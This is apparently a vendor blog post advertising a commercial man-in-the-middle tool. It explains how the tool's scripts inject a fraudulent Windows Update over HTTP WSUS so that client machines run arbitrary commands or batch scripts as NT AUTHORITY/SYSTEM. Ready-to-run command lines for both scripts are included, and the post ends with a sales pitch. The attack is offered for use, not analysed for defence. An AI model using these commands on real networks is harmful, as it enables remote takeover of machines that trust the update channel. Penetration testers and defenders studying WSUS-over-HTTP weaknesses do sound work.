The power of dynamic socket injection: WSUS command execution as [NT AUTHORITY/SYSTEM]
Some time ago we published an important update to Syphoon, featuring the new dynamic socket injection system. In short, this allows using Ruby code to generate content on the fly for context-dependent injections.
Taking things further
To demonstrate the power of dynamic injections, we thought we'd publish a new release of Syphoon, this time including some new scripts. Specifically, two new scripts are provided to attack the Windows Update system (WSUS) when configured to use HTTP.
This first script simply allows running commands (through cmd.exe) as 'NT AUTHORITY/SYSTEM' on any client machine requesting WSUS through HTTP. This is done by injecting a fraudulent update consisting of PsExec64.exe from PsTools and some "installation arguments" containing the desired command.
The script takes two arguments: the port on which WSUS runs (usually 8530), as well as the actual command to be executed.
As an example, let's get the username into a file in the C: drive. For this we can use this simple command:
# syphoon -a "wsus-inject-cmd:8530 'whoami > C:/pwn.txt'" -I WSUS_SRV_IP wlan0
The Windows client happily downloads and installs the "update":
Immediately after this, a file appears on the C: drive:
Inevitably, there will be cases where the command we want to execute starts to get quite long. Usually, we'll even want to execute more than one command.
For this type of scenario, the wsus-inject-bat script offers a more flexible approach: instead of a single command, an entire Batch script is injected.
The script should be saved as DROOT/htfilesrv/wsus_pwn.bat (an example is provided within the Syphoon distribution). Let's configure it to again get the username into a text file:
Using it is as simple as:
# syphoon -a "wsus-inject-bat:8530" -I WSUS_SRV_IP wlan0
All of this is available in the latest Syphoon release: 1.4.3
Get your license today from the store: Syphoon - Weapons-Grade MitM